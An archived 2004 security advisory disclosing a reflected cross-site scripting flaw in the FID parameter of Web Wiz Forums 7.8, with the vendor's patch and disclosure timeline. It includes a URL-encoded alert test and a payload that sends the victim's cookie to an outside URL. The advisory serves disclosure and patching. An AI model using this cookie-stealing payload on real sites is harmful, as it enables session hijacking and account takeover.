webwizXSS.txt

webwizXSS.txt: Posted Jun 18, 2004; Authored by Ferruh Mavituna | Site ferruh.mavituna.com; Web Wiz Forums version 7.8 is susceptible to a cross site scripting attack.; tags | advisory, web, xss; SHA-256 | fb95299c719e87d28e1135b8c3aef3ab5dcb36a4e9f359d4685af5c1f35642cd; Download | Favorite | View

webwizXSS.txt

------------------------------------------------------
WEB WIZ FORUMS REGISTRATION RULES XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?528

XSS / Cross Site Scripting attack allows an attacker to hijack other
users/administrators account.


------------------------------------------------------
ABOUT WEB WIZ FORUMS;
------------------------------------------------------
Web Wiz Forums, the free award winning ASP bulletin board system software,
can add value to almost any web site.

Whether you are building a small interactive community with 10 people or
over 100,000 strong customer support forum, this fast, scalable, bulletin
board engine can manage your community


URL & Demo & Source Code Download ;
http://www.webwizguide.info/web_wiz_forums/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.8 [possibly lower versions]


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.9


------------------------------------------------------
PROBLEM;
------------------------------------------------------
- Page
registration_rules.asp (Parameter : FID)

- Test;
registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2
7%29%3C%2Fscript%3E

- Possible Exploit Pattern;
- This sample sends cookie to victim URL [in sample
http://ferruh.mavituna.com/xss/]
registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javasc
ript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2E
com%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E


------------------------------------------------------
HOW TO PATCH [provided by vendor];
------------------------------------------------------
Download http://www.zap2.me.uk/7.7a_and_7.8_to_7.9_patch_files.zip
Version 7.9 has been released to deal with this issue.
Change line 65 of the file registration_rules.asp that reads:-

intForumID = Request.QueryString("FID")

To the following:-

If isNumeric(Request.QueryString("FID")) Then
         intForumID = CInt(Request.QueryString("FID"))
Else
         intForumID = 0
End If




-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 14.06.2004
Vendor Informed : 15.06.2004
Published : 15.06.2004


------------------------------------------------------
Vendor Status;
------------------------------------------------------
Quickly answered & fixed.


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

PGPKey : http://ferruh.mavituna.com/PGPKey.asc

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 150 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

webwizXSS.txt

webwizXSS.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

webwizXSS.txt

Share This

webwizXSS.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems